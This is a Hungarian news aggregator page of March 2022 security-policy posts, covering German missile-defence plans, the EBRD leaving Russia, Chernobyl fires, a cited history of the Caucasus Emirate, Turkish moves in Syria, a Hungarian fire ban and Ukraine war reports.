“Jobban meg kell védenünk magunkat az Oroszországból érkező fenyegetéssel szemben, és ehhez gyorsan szükségünk van egy egész Németországra kiterjedő rakétavédelmi pajzsra” – mondta a Bild am Sonntagnak Andreas Schwarz, a szövetségi parlament költségvetési bizottságának védelmi költségvetésre szakosodott tagja, hozzátéve, hogy a Nyíl-3 “jó megoldás” lenne.

Olaf Scholz kancellár és Eberhard Zorn, a hadsereg (Bundeswehr) főfelügyelője szerdán kezdte meg a részletes egyeztetéseket arról, hogy konkrétan miként kellene felhasználni a védelmi képességek fejlesztésére szánt 100 milliárd eurós (37 300 milliárd forint) külön alapot. A Nyíl-3 rendszer beszerzésének lehetőségéről is tárgyaltak – írta a Bild am Sonntag.

Az ügyben a Bundestag vezető védelmi szakpolitikusai is tájékozódnak egy vasárnaptól csütörtökig tartó izraeli látogatáson. A küldöttség tagjai között van a védelmi bizottság elnöke, Agnes Strack-Zimmermann is. A politikus a Welt hírtelevíziónak vasárnap azt mondta, hogy a “fenyegetettségi helyzetre” és az orosz hadseregben használt fegyverrendszerekre tekintettel, a német kormánynak is meg kell vizsgálnia egy rakétavédelmi rendszer beszerzésének kérdését. Hozzátette, hogy többféle lehetőség is van.

A szövetségi kormány az Ukrajna elleni orosz támadás első napjaiban határozta el, hogy felállítanak egy százmilliárd eurós pénzügyi alapot az ország védelmi képességeinek fejlesztésére, és ezen felül minden évben a hazai össztermék két százalékát meghaladó összeget fordítanak védelemre. Arról is döntöttek, hogy a válságövezetekbe irányuló fegyverexportot elutasító hagyományos német álláspontot megváltoztatva, mégis küldenek fegyvereket az ukrán hadseregnek.

Az ukrajnai fegyverszállítás beindítása és a nagy arányú – a NATO-tagoktól elvárt, GDP-arányosan két százalékos védelmi költségvetést meghaladó mértékű – haderőfejlesztés irányváltás a hidegháború vége óta követett német politikában. A kormány indoklása szerint mindkettő elkerülhetetlen, mert az Ukrajna elleni orosz invázió fordulópont az európai történelemben, és az új korszakban új politika szükséges az ország, a szabadság és a demokrácia megvédéséhez.

A Kremlt aggasztják Biden Putyinra tett megjegyzései
Joe Biden amerikai elnök szombati varsói beszédében az ukrajnai háborúval kapcsolatban “mészárosnak” nevezte Putyint, aki szerinte “nem maradhat hatalmon”. Az amerikai elnök erkölcstelen háborút folytató “gyilkos diktátornak”, “gonosztevőnek” és “háborús bűnösnek” is nevezte Putyint. A Kremlt aggodalommal töltik el Biden  újabb, Putyinra tett megjegyzései és továbbra is élénk figyelemmel kíséri a tengerentúli vezető kijelentéseit – nyilatkozott hétfőn Dmitrij Peszkov orosz elnöki szóvivő újságíróknak Moszkvában.

The post Orosz agresszió: izraeli légvédelmi rendszer beszerzését mérlegelik Németországban appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: az EBRD bezárja moszkvai és minszki irodáit

Biztonságpiac - Tue, 03/29/2022 - 05:35
Az Európai Újjáépítési és Fejlesztési Bank (EBRD) hétfőn bejelentette, hogy bezárja moszkvai és minszki irodáit.

A közép- és kelet-európai gazdaságok, valamint az egykori szovjet térség átalakulásának támogatására 1991-ben életre hívott londoni pénzintézet szerint az irodák bezárása már folyamatban van. Hétfői tájékoztatásában a bank hangsúlyozza, hogy erőteljesen elítéli az ukrajnai háborút, és a moszkvai, valamint a minszki EBRD-iroda bezárása egyenesen következik Oroszország cselekedeteiből, amelyekhez Fehéroroszország segítséget nyújt.

Az EBRD közölte, hogy továbbra is megingathatatlanul támogatja Ukrajnát, a már összeállított egy támogatási csomagot kétmilliárd euró értékben Ukrajnának és a háború által érintett más országoknak. Ezt a programot az EBRD két hete hirdette meg.

Az igénybe vehető támogatási formák közé tartozik a törlesztési kötelezettségek halasztása és átstrukturálása, a kereskedelemfinanszírozás, beleértve az üzemanyagimporthoz nyújtandó támogatást, sürgősségi likviditásfinanszírozás partnerintézmények bevonásával, valamint az ukrán hatóságok támogatása a sürgősen szükségessé váló reformok bevezetésében, például azonnali törvényalkotási és szabályozói intézkedések végrehajtásában.

Az Ukrajnával szomszédos, menekülteket befogadó országok számára a program egyik fő eleme az energiaellátás biztonságát szolgálja, egyebek mellett sürgősségi energiahordozó-vásárlások finanszírozásával az Oroszországból és Fehéroroszországból érkező import esetleges kiesésének pótlására.

Az EBRD támogatási csomagjából jut a menekülteket ellátó települési helyhatóságok szolgáltatásainak finanszírozására, kereskedelemfinanszírozásra, valamint likviditáspótlásra a befogadó országok kis- és közepes vállalkozásai számára is. Az EBRD a minap bejelentette azt is, hogy a kormányzótestület jóváhagyása esetén határidő megjelölése nélkül felfüggeszti Oroszország és Fehéroroszország hozzáférését a bank finanszírozási forrásaihoz és szakértői tevékenységéhez.

Az EBRD-finanszírozások legnagyobb egyedi felvevője korábban minden évben Oroszország volt, de a bank részvényes országai 2014-ben, a krími válság nyomán azt az informális iránymutatást adták az igazgatóságnak, hogy az EBRD – összhangban a Moszkvával szemben akkor meghozott nemzetközi szankciókkal – ne kezdjen új finanszírozási programokat Oroszországban. Ezt a döntést teszi hivatalossá – és terjeszti ki Fehéroroszországra is – az EBRD igazgatótanácsának kezdeményezése az oroszországi és a fehéroroszországi finanszírozások felfüggesztésére.

Több mint tízezer hektár erdő ég Csernobilnál
Több mint tízezer hektár erdő áll lángokban a csernobili atomerőmű körüli, úgynevezett tiltott zónában a térségben zajló harci cselekmények miatt – közölte Ljudmila Denyiszova ukrán emberi jogi biztos, akit az Ukrajinszka Pravda hírportál idézett. Az ombudsman közölte, hogy 31 tűzesetet jegyeztek fel. “A tüzek megfékezése és oltása lehetetlen, mivel az orosz csapatok elfoglalták a tiltott zónát. Az égés következtében radioaktív anyagok kerülnek a légkörbe, amelyeket a szél jelentős távolságokra visz el. Ez sugárzással fenyegeti Ukrajnát, Fehéroroszországot és az európai országokat” – fogalmazott. A tisztségviselő kiemelte, hogy a szeles és száraz időjárás miatt nő a tüzek intenzitása és területe. “A lángok a csernobili zóna területén található kiégett nukleáris fűtőelemek és nukleáris hulladékok tárolására szolgáló létesítményeket is elérhetik” – figyelmeztetett. A biztos ezért a Nemzetközi Atomenergia Ügynökséghez (NAÜ) fordult azzal a felhívással, hogy a lehető leghamarabb küldjenek szakértőket és tűzoltó felszereléseket Ukrajnába. “A katasztrofális következmények csak a terület orosz megszállásának azonnali megszüntetésével előzhetők meg. Ezért felszólítom a nemzetközi emberi jogi szervezeteket, hogy tegyenek meg minden lehetséges intézkedést az Oroszországi Föderációra nehezedő nyomás fokozására az Ukrajna elleni katonai agresszió leállítása és az magas kockázatú zónák felszabadulása érdekében” – tette hozzá az ombudsman.

The post Orosz agresszió: az EBRD bezárja moszkvai és minszki irodáit appeared first on .

Categories: Biztonságpolitika

A Kaukázusi Emirátus története

Biztonságpolitika.hu - Mon, 03/28/2022 - 20:03
A téma megnevezése Jelen cikk az Észak-kaukázusi Szövetségi körzet részét képező Csecsenföld népének és történelmének bemutatására törekszik. Ezt követően az Észak-Kaukázus ISIS-eként is emlegetett Kaukázusi Emirátus nevet viselő terrorszervezet létrejöttének okai, történelmi gyökerei és tevékenysége kerül bemutatásra az első és második csecsen háború, illetve a nemzetközi terrorizmus elleni küzdelem kontextusában. Bevezetés

Az Észak-kaukázusi Szövetségi Körzet (Северо-Кавказский федеральный округ) hét szubjektumot foglal magába:

  1. Csecsenföld
  2. Dagesztán
  3. Észak-Oszétia
  4. Ingusföld
  5. Kabard-és Balkárföld
  6. Karacsáj- és Cserkeszföld
  7. Sztavropoli határterület

A szövetségi körzet 170,4 ezer négyzetkilométernyi területet foglal magába, mely az Oroszországi Föderáció 1%-át teszi ki. A legfrissebb demográfiai adatok alapján a területen közel 10 millió ember él, tehát a föderáció népességének közel 7%-a. Az észak-kaukázusi térségben olyan népekkel találkozunk, mint az adigék, kabardok, balkárok, karacsájok, ingusok, avarok, kumikok, kalmükök, nogájok, oszétok.[i] Etnikai szempontból egy rendkívül színes és többségében muszlim lakosságú körzetről beszélhetünk.[ii]

Az Észak-Kaukázus legnagyobb őslakos népe a csecsen, akiknek önelnevezése a „nohcsij”. A csecsen nyelv a kaukázusi nyelvek közé sorolható. Vallásuk a szunnita muszlim, ami a 18. században vált meghatározóvá. Történelmük során több birodalom kereszttüzébe kerültek, így a 16-17. században az Oszmán Birodalom, majd Irán célvonalába.[iii] Az Orosz Birodalom a 19. század elején déli irányba kezdett terjeszkedni. Ezt követően 1829-ben jött létre az Észak-kaukázusi Imamátus, melynek pacifikálása hosszú évtizedekig tartott az orosz hatalom számára. A korszak emblematikus alakja Samil imám, aki 1834-1859 között vezette a csecsen felkelést az orosz cári csapatok ellen. Az előbb megnevezett imámot a mai napig nemzeti kultusz övezi. Végül 1864-ben az Orosz Birodalomhoz csatolták a csecsen területeket az Alekszej Petrovics Jermolov tábornok által vezetett erők. [iv]

1922-ben hozták létre a Csecsen Autonóm Körzetet a Hegyi Autonóm Szocialista Köztársaságon belül. Ezt követően 1934-ben a csecsen területet egyesítették az ingus autonóm területekkel és létrejött a Csecsen-Ingus Autonóm Szovjet Szocialista Köztársaság. A második világháború során, 1944-ben a csecsen népet kollektíve a németekkel való kollaborációval vádolták, aminek eredményeként az egész lakosságot (kb. fél millió főt) deportálták Kazahsztánba és Kirgíziába. A hruscsovi olvadás időszakában, 1957-ben térhettek vissza hazájukba. A szovjethatalom konszolidációja hosszú időt vett igénybe, hiszen a társadalomban fennmaradtak az általuk gyakorolt tradicionális-patriarchális elemek, mint a vérbosszú, a saría, az idősek feltétlen tisztelete és az erős vallásosság.[v]

A peresztrojka és glasznoszty időszakában nemzeti mozgalmak alakultak ki a függetlenség érdekében. Ezt követően 1991-ben Dzsohar Dudajev vezetésével kikiáltották függetlenségüket, és létrejött a Csecsen Köztársaság. A volt autonóm köztársaság másik része (Ingusföld) az Oroszországi Föderáció tagköztársasága lett, míg 1993-ban a csecsen vezetés ezzel ellentétesen a függetlenség mellett döntött. Ezután kezdődött meg az első csecsen háború (1994-1996), melynek lezártával Csecsenföld autonómiát kapott, de instabilitás jellemezte a köztársaságot. A források szerint a bűnözés és korrupció egyre többször jelent meg. A helyzet hozzájárult a társadalomban a radikális iszlám terjedéséhez és a terrorcselekmények számának növekedéséhez. Ennek következtében kezdetét vette a második csecsen háború (1999-2000). Ebben a háborúban már a szeparatista törekvések mellett a radikális iszlám is dominált és több terrorista akció vette kezdetét. Az első és második csecsen háború külön elemzés tárgyát képezhetné, így csak a legfontosabb, a cikk logikai szempontjából szükséges elemek kerülnek említésre. A második háború lezárását követően vette kezdetét a Vlagyimir Putyin által meghirdetett terrorizmus elleni harc a térségben, mely a 2010-es évekig tartott és sor került a csecsen hadurak likvidálására. A meghirdetett terrorizmus elleni harc a Nemzet és Biztonság egyik vonatkozó tanulmánya szerint hivatalosan 2009. április 16-án ért véget.[vi]

A Kaukázusi Emirátus

A Kaukázusi Emirátus nevű terrorszervezetet az Észak-Kaukázus ISIS-eként is szokták emlegetni a témában megjelent szakirodalomban. A terrorszervezet létrejötte és ideológiája összefüggésben áll a korábban bemutatott 19. századi orosz hódító tevékenységgel, mely során a függetlenségi harc állt a középpontban. Fontos kiemelni, hogy a 18. század során a térségben egy sajátos törzsi iszlám honosodott meg. Ennek értelmében az iszlám hitelemeket saját vallási tanaikhoz és hiedelmeikhez igazítva vették át, így az Észak-Kaukázusban gazvatnak nevezett dzsihád is más értelmezést nyert.[vii]

Az iszlám fundamentalizmus a 80-as évek második felében, majd a 90-es években rohamosan terjedni kezdett, központja Dagesztán és Csecsenföld lett. Ez az irányzat népszerűvé vált a fiatalok körében, akik a saría törvénykezésen nyugvó, Észak-Kaukázusra kiterjedő muszlim állam megvalósítására törekedtek. Mi lehetett ennek az oka? Hozzájárult a régióban lévő magas munkanélküliségi ráta, korrupció, a gazdasági hatalomért folyó harc a klánok között, a jövedelemelosztás és a szövetségi költségvetésből való részesedés közötti ellentét is, tehát kijelenthető, hogy a gazdasági és szociális nehézségek okán fordulnak a fiatalok a radikális eszmékhez.[viii] Fontos kiemelni, hogy elsősorban azokról a fiatalokról beszélhetünk, akik átélték az első és második csecsen háború borzalmait és akár egész családjukat elvesztették közben. A szociális és gazdasági problémák mellett hangsúlyozásra kerül az emberi jogok tiszteletben nem tartása és az orosz hatóságok és fegyveres erők kegyetlen fellépése.[ix]

A 90-es évek eseményeinek és a szervezet létrejöttének megértéséhez fontos kiemelni, hogy az iszlám vallás és az állami politika a korábban említett Dudajev elnöksége idején kezdett egybefonódni. Miután 1996-ban Dudajevet az orosz titkosszolgálat sikeresen likvidálta, Zeliman Janderbijev vette át a hatalmat. Őt követte 1997-ben Aszlan Maszhadov, akinek elnöksége idején a szociális és gazdasági problémák súlyosbodtak. A hatalmat a tejpek és szervezett bűnözői csoportok gyakorolták. Ekkor vette kezdetét a „harc” Samil Baszajev hadúr és Aszlan Maszhadov között. Baszajev a második háború során, – mely a dagesztáni betöréssel vette kezdetét Ibn Hattab vezetésével és 1999 nyarán kikiáltották a Dagesztáni Iszlám Államot – taktikai eszközként használta a radikális iszlámot, elnöksége idején alkotmányi szintre emelte az iszlám vallást és bevezetésre került a saría alapú törvénykezés. A Samil Baszajev tevékenysége idején végrehajtott terrorcselekmények között találhatjuk a 2002. október 23.-i Dubrovka Színház elleni támadást, a 2004-es moszkvai metró robbantást, illetve az orosz 9/11-ként emlegetett beszláni, általános iskolai túszdrámát is. [x]

Baszajev vezetésével a csecsen szeparatista mozgalom a regionális dzsihád eszméje felé kezdett fordulni, így jött létre 2005-ben a Kaukázusi Front Abdul Halim Szudajev vezetésével. Ennek egyik oka volt, hogy Baszajev likvidálása után és a 2004. szeptember 1-én zajló „beszláni túszdrámát” követően a kaukázusi terrorizmus változáson esett át. Ezt követően megfogalmazódott, hogy a kormányzati és katonai létesítmények ellen kell elkövetni a támadásokat.[xi]

Így jött létre 2007-ben a Kaukázusi Emirátus nevű szervezet, melyet Doku Hamatovics Umarov alapított. Ez egy ernyőszervezet, mely másik 5 szervezetet foglal magába, ezáltal vilajetekre tagozódik, melyeknek élén emírek állnak. Az általuk megfogalmazott dzsihád célja az iszlám állam kikiáltása az Észak-Kaukázusban, így egyfajta pánkaukázusi eszméről beszélhetünk. A terrorszervezet Doku Umarov alapítása óta a szunnita szalafita irányzat elveit követi és további célja az al-Kaida globális dzsihádjához való csatlakozás volt, melyet 2009-ben meg is tettek. Emellett hosszabb időre visszanyúlóan jelentős kapcsolatokat tartottak fent az al-Kaidával és a Talibánnal. [xii]

Mint korábban említésre került, a ’90-es évek és a 2000-es évek korai éveinek célpontjaival ellentétben a kormányzati és katonai létesítmények elleni támadásokat hangsúlyozta a szervezet vezetője. Ezt 2011-ben kiegészítették azzal, hogy a gazvat során az akciókat orosz belügyi és katonai szervezetek ellen hajtsák végre.  A Kaukázusi Emirátus ezen időszakában hajtották végre például a Nyevszkij Expressz elleni támadást (2009. november 27.), moszkvai metró támadását (2010. március 29.) és Domogyedovo repülőtér elleni támadást (2011. január 24.).[xiii]

Elmondható, hogy még Doku Umarov vezetősége idején (2007-2013) szakadás történt a szervezeten belül, ugyanis több emír esküt tett az ISIS-nek, és a szíriai polgárháború kirobbanásával több radikális eszmét valló személy hagyta el a térséget és távozott Irakba és Szíriába (kb. 5000 fő). 2015-ben felmerült a szervezet feloszlatásának gondolata, aminek hátterében a nemzetközi finanszírozása csökkenése állt, továbbá a régió csoportjai közül többen hűséget nyilvánítottak az Iszlám Államnak. A Kaukázusi Emirátust az ISIS egyik helyi ágazata „cserélte le” Wilayat al-Qawqaz” néven. Elmondható, hogy a 2016 után elkövetett támadásokért az ISIS vállalta a felelősséget. A szakirodalom kitér arra, hogy az Emirátus modellje az ISIS számára is inspiráció volt. Egy 2021-ben íródott tanulmány szerint jelenleg 400-1500 főre tehető a harcosok száma és működésük a csecsenföldi hegyvidékre korlátozódik.[xiv]

Orosz reakció

A terrorizmusra adott válaszreakció már az első csecsen háború során zajló túszdrámák után jelentkezett. Egy 1998-ban kiadott jogszabály fogalomtisztázó jellege mellett kilátásba helyezett olyan intézkedéseket, melyekben a kollektív büntetésről és különböző szűrőtáborok létesítéséről rendelkezett. A 2000-ben elfogadott kül-és biztonságpolitikai dokumentumok sora veszélyforrásként tekinti a terrorizmusra. A terrorizmus finanszírozása elleni harcról szóló törvényt 2002 nyarán hirdették ki. A stabilitás megteremtéséhez szükséges másik elem a Kremlhez lojális vezető kinevezését és a magas pénzbeli támogatást foglalja magába. A Kreml és Csecsenföld között egy kliens-patrónus viszony figyelhető meg, melyben a „stabil instabilitás” jelenik meg.[xv]A nemzetközi terrorizmus elleni harc során az észak-kaukázusi szervezet tevékenységére válaszreakcióként 2006. február 15-én létrehozták a Nemzeti Antiterrorista Bizottságot. A rendelkezésre álló forrás szerint a Bizottság célja, hogy „koordinálja a terrorizmus ellenes tevékenységgel foglalkozó szervezetek munkáját, kapcsolatot tartson fenn a külföldi társszervezetekkel”. A fő szerepet a Szövetségi Biztonsági Szolgálat kapta és helyi operatív törzseket hoztak létre. A Nemzeti Antiterrorista Bizottság külön Észak-Kaukázusi Szövetségi körzet elnöki követtel rendelkezik. Több nemzetközi emberi jogokkal foglalkozó szervezet elítélte bizonyos esetben munkájukat.[xvi] A 2014-es Szocsi Olimpa elhalasztása is felmerült a Kaukázusi Emirátus tevékenysége miatt. Az emír felszólította a modzsáhedekett, hogy „az őseik csontjai felett rendezendő olimpiát minden-Allah által adott-eszközzel akadályozzák meg…,és mindent tegyenek meg azért, hogy meghiúsítsák ezt az őseik csontjain való sátáni táncikálást..” A Kreml válaszreakcióként egy 2013-as augusztusi rendeletben a biztonság szavatolhatósága érdekében kijelentette, hogy blokád alá vonja Szocsi városát 2014. január 7-étől március 21-ig. Ennek értelmében szigorította a ki- és belépést, tiltott zónákat hozott létre, a külföldiek iratainak szigorú ellenőrzését helyezte kilátásba, szabályozza a fegyvertartást és a nemzetbiztonsági szervek hatáskörének erősítését hangsúlyozta.[xvii] A nyilvánosságra hozott terrorizmus elleni hadműveletek adataiban évről évre csökken a likvidált személyek és szervezek száma, akik kapcsolatba hozhatók a radikális megmozdulásokkal. Az orosz biztonsági erőknek fontos azon változásokra figyelniük, melyek az Irakból és Szíriából visszatérő dzsihadista harcosokkal járhatnak.[xviii]

Összegzés

A cikkben bemutatásra került az Észak-kaukázusi Szövetségi Köztársaság és az ott élő népek. Megismerhettük a Kaukázusi Emirátus történetét, melynek létrejötte és ideológiai iránya a 19. század nyúlik vissza, valamint szoros összefüggésben áll a 90-es években zajló első és második csecsen háborúval. A cikk során bemutatásra került a „gazvat”, azaz az észak-kaukázusi dzsihád, melynek jellege összefügg a kaukázusi népek által elszenvedett sérelmekkel és szenvedéssel. Az eltérő jelleget példázza, hogy alapvetően egy nemzetiségi indíttatású dzsihádról beszélhetünk, mely az oroszok és „kiszolgálóik” ellen irányul, továbbá megismerhettük az ISIS és a Kaukázusi Emirátus közötti kapcsolatot is.

Írta: Ignáth Dorina

Kiemelt kép forrása: flickr.com

Hivatkozások:

[i]Gyóni Gábor: A történelmi Oroszország népei. Adattár. Russica Pannonicana, 2011. 154-182.

[ii]Kiss Annamária: A radikális iszlám észak-kaukázusi terjedése, mint orosz biztonsági kihívás. Külügyi Szemle. 2013.(ősz). 77.

[iii]Uo. 164-165.

[iv]Lars Karl: Egy meg-és kitalált lázadó. Samil imám este az Orosz Birodalommal és a Szovjetunióval, 1859-1953. Világtörténet, 2014. 3. 483-484.

[v]Gyóni Gábor, 2011: 164-165.

[vi]Kiss Adrienn: Konfliktusok és önrendelkezés a Kaukázusban. Hadtudományos, 2016. 26. évfolyam.130-131.

Likvidálások menetéről bővebben lásd: Kiss Annamária, 2013: 82.

[vii]Gerencsér Árpád-Siposné Kecskeméthy Klára: Kaukázusi Emirátus (Imarat Kavkaz). Az Észak-Kaukázus ISIS-e. Hadtudomány. 31. évfolyam, 2. szám. 2021. 11-14.

[viii]Kiss Annamária, 2013: 79.

[ix] Gerencsér Árpád-Siposné Kecskeméthy Klára: 33.35.

[x]Kiss Annamária, 2013: 81-82.

[xi] Gerencsér Árpád-Siposné Kecskeméthy Klára: 19.

[xii]Gerencsér Árpád-Siposné Kecskeméthy Klára: 19-25.

[xiii]Uo.

[xiv]Uo. 26.32.

[xv]Kiss Annamária, 2013: 77-78.

[xvi]Uo. 35.

[xvii]Kiss Annamária, 2013: 86-89.

[xviii]Gerencsér Árpád-Siposné Kecskeméthy Klára: 27.

A A Kaukázusi Emirátus története bejegyzés először Biztonságpolitika-én jelent meg.

Categories: Biztonságpolitika

Szíria: Törökország több száz katonáját vonja ki a “feszültségcsökkentési” övezetből

Biztonságpiac - Mon, 03/28/2022 - 16:35
Törökország 400 katonáját vonná ki az északnyugat-szíriai Idlíb tartománybeli feszültségcsökkentési övezetből, az egységeket az Irak északi részén aktív Kurdisztáni Munkáspárt (PKK) harcosai ellen vetné be – adta hírül hétfőn az as-Sark al-Avszat című, londoni székhelyű pánarab napilap az Emberi Jogok Szíriai Megfigyelőközpontjára (OSDH) hivatkozva.

A szíriai polgárháború eseményeit nyomon követő, nagy-britanniai székhelyű OSDH szerint a török katonák feladata az Irak mentén végzett műveletek támogatása lenne.

Tavaly a török hadsereg nagyszabású katonai akciót indított a török-iraki határ térségében, illetve az Irak északi részén bujkáló kurd gerillák ellen, a műveletekben a török fegyveres erők különleges egységeit is bevetették. Az akció célja az Ankara – valamint az Egyesült Államok és az Európai Unió – által terroristának minősített PKK bázisainak megsemmisítése volt. Az akció során a török légierő iraki célpontokat is bombázott, emiatt Bagdad tiltakozott.

Elképzelhető, hogy a most kivonandó kontingenst újabb egységek követik majd – jegyezte meg az OSDH. A török parlament 2021 októberében két évvel meghosszabbította a hadsereg szíriai és iraki műveleteire adott mandátumát. Az északnyugat-szíriai, 2017-ben létrehozott létrehozott övezetben jelenleg mintegy 13 500 török katona állomásozik.

Az as-Sark al-Avszat hozzátette, hogy az elmúlt napokban több összecsapást jelentettek a Törökország támogatását élvező szíriai milíciák és a kurdok vezette Szíriai Demokratikus Erők (SDF) fegyveresei között az északkeleti Haszaka tartományból. A harcok nyomán több helyen áramkimaradásról számoltak be.

The post Szíria: Törökország több száz katonáját vonja ki a “feszültségcsökkentési” övezetből appeared first on .

Categories: Biztonságpolitika

OKF: tűzgyújtási tilalom van az egész országban

Biztonságpiac - Mon, 03/28/2022 - 12:10
Tűzgyújtási tilalom van érvényben az egész országban – közölte az Országos Katasztrófavédelmi Főigazgatóság (OKF).

A katasztrófavédelem közleménye szerint tilos tüzet gyújtani erdőkben, fásításokban, facsoportokban, útszéli fasorokban és ezek kétszáz méteres körzetében, még a kijelölt tűzrakóhelyeken is. Felhívták a figyelmet, hogy a csapadékmentes időjárás miatt nagy a szárazság, ezért amíg ki nem zöldül a természet, a legkisebb figyelmetlenség is könnyen hatalmas tűzhöz vezethet.

A tűzoltókat az idén már több mint 3500 alkalommal riasztották szabadtéri tűzhöz, a leégett terület nagysága csaknem hétezer hektár. A szabadtéri tüzek miatt öt ember sérült meg. A napokban a Kis-Balatonnál hatszáz hektárnyi terület égett le – emelték ki.

Azt javasolták, hogy a tüzek megelőzése érdekében a dohányosok ne dobják el az égő cigarettacsikket. Ahol engedélyezik a kerti zöldhulladék-égetést, ott csak az önkormányzati rendeletben meghatározott időben szabad ezt végezni. Mindig legyen a közelben víz és egy szerszám, amellyel kordában lehet tartani a tüzet – kérte a katasztrófavédelem.

Az aktuális tűzgyújtási tilalomról a www.erdotuz.hu és a www.katasztrofavedelem.hu honlapon elhelyezett térkép segítségével tájékozódhatnak az érdeklődők.

A Nemzeti Élelmiszerlánc-biztonsági Hivatal (Nébih) közleményben kérte, hogy mindenki legyen fokozottan körültekintő, Magyarországon ugyanis az erdőtüzek 99 százalékát emberi mulasztás okozza. Ahivatal szerint a gondatlan és szándékos tűzhasználat miatt megnövekedett a vegetációtüzek esetszáma a tűzgyújtási tilalommal eddig nem érintett megyékben is. “A kiszáradt talaj és biomassza miatt gyors tűzterjedés alakulhat ki akár már kisebb szél vagy lejtőhatás esetén. Megnő a keletkező tüzek intenzitása, valamint ugrótűz potenciálja, ami tovább gyorsíthatja a tűzterjedést” – figyelmeztetett a Nébih.

 

The post OKF: tűzgyújtási tilalom van az egész országban appeared first on .

Categories: Biztonságpolitika

Orosz agresszió: Ukrajnában két nagy olajraktár megsemmisült

Biztonságpiac - Mon, 03/28/2022 - 08:35
A ukrán megyei vezetők megerősítették vasárnap, hogy rakétacsapások következtében teljesen megsemmisült két nagy olajraktár Nyugat-Ukrajnában.

Vitalij Koval, a nyugati országrészben fekvő Rivne megyei katonai adminisztráció vezetője az Eszpresszo ukrán televízió műsorában elmondta, hogy a légi csapás szombat este érte a Dubnóban található olajraktárt, amely ennek következében teljesen kiégett, személyi sérülés viszont nem történt.

Makszim Kozockij, a szintén nyugat-ukrajnai Lviv megye katonai adminisztrációjának vezetője pedig azt erősítette meg a Telegram üzenetküldő portálon, hogy a megyeszékhelyen, Lvivben semmisült meg az előző esti orosz rakétatámadásokban egy olajraktár. Emberáldozatokról ő sem adott hírt. Hozzátette, hogy a bázison egész éjjel, 12 órán át küzdöttek a lángok megfékezésével, mostanra már sikerült eloltani a tüzet.

Az orosz csapatok által megszállt csernobili atomerőműben mostanra sikerült leváltani az ukrán személyzet egy részét – közölte vasárnap Jurij Fomicsev, a lekapcsolt nukleáris létesítménytől északra fekvő Szlavutics város polgármestere egy tévéműsorban. Azokat a szakembereket váltották fel újakra, akik az Ukrajna elleni teljes körű orosz támadás kezdetétől, február 24-től voltak szolgálatban. Az erőművet már a támadás legelején elfoglalták az orosz erők. A polgármester szerint időről időre kapcsolatba tudnak lépni telefonon az ottmaradt személyzettel. Szavai szerint önkéntes alapon vállalták a szolgálatot azok, akiket váltásként odaküldtek dolgozni. Reményét fejezte ki, hogy az atomerőmű dolgozóit gyakrabban fogják tudni váltani. Fomicsev hozzáfűzte, hogy van elegendő élelmiszer a csernobili létesítményben, még a háború kezdete előtt feltöltötték a készleteket.

A polgármester arról is beszámolt, hogy az orosz erők már benyomultak a városba, amelyet jó ideje körbezárva tartottak. Eddig a településen hárman haltak meg katonai szolgálatteljesítés közben, két polgári személy pedig az orosz támadások elleni egyik tüntetésen sérült meg, amikor az orosz megszállók oszlatógránátot dobtak a demonstrálók közé.

A dél-ukrajnai Mikolajiv városában harminc lakos sebesült meg a megyeszékhelyet ért szombati orosz tüzérségi támadások következtében – írta a Telegramon Hanna Zamazjejeva megyei tanácselnök. Hozzátette, hogy vasárnap reggeli adatok alapján jelenleg 279, a támadásokban megsebesült helyi lakost ápolnak kórházban a megyében.

Az orosz hadsereg által megszállt dél-ukrajnai Herszon városában ismét tüntettek a helyi lakosok annak ellenére, hogy az orosz erők betiltották a demonstrációkat. A Moszt helyi hírportál jelentése szerint az orosz katonák lövéseket adtak le és oszlatógránátokat vetettek be a megszállás ellen tüntetőkkel szemben. Szemtanúk sérültekről is beszámoltak, pontos számuk azonban egyelőre nem ismert.

Az ukrán fegyveres erők eközben arról adtak hírt, hogy kiverték az orosz csapatokat a kelet-ukrajnai Harkiv megyében lévő Huszarivka településről. Közlésük szerint a harcok közben mintegy száz orosz katonával végeztek és hatvan haditechnikai eszközt semmisítettek meg. Ezt megelőzően az Azov ezred helyi területvédelmi egysége közölte, hogy Harkiv megyében felszabadították Vilhivka falut, mintegy hetven orosz katonát öltek meg és 27-et ejtettek fogságba.

A védelmi minisztérium nyilvánosságra hozta, hogy a teljes körű háború kezdete óta hét orosz tábornok vesztette életét az ukrajnai harcokban, közöttük a legmagasabb rangú tiszt Jakov Rezancev altábornagy volt, akit pénteken öltek meg.

Az ukrán vezérkar legfrissebb, vasárnapi összesítése szerint eddig hozzávetőlegesen 16 600 orosz katona esett el, mintegy ezer került fogságba. Az ukrán erők megsemmisítettek 121 orosz repülőgépet, 127 helikoptert, hét hadihajót, 582 harckocsit, csaknem 1700 páncélozott harcjárművet, mintegy háromszáz tüzérségi és 52 légvédelmi rendszert, valamint 93 rakéta-sorozatvetőt.

The post Orosz agresszió: Ukrajnában két nagy olajraktár megsemmisült appeared first on .

Categories: Biztonságpolitika

Pages

THIS IS THE NEW BETA VERSION OF EUROPA VARIETAS NEWS CENTER - under construction
the old site is here

Copy & Drop - Can`t find your favourite site? Send us the RSS or URL to the following address: info(@)europavarietas(dot)org.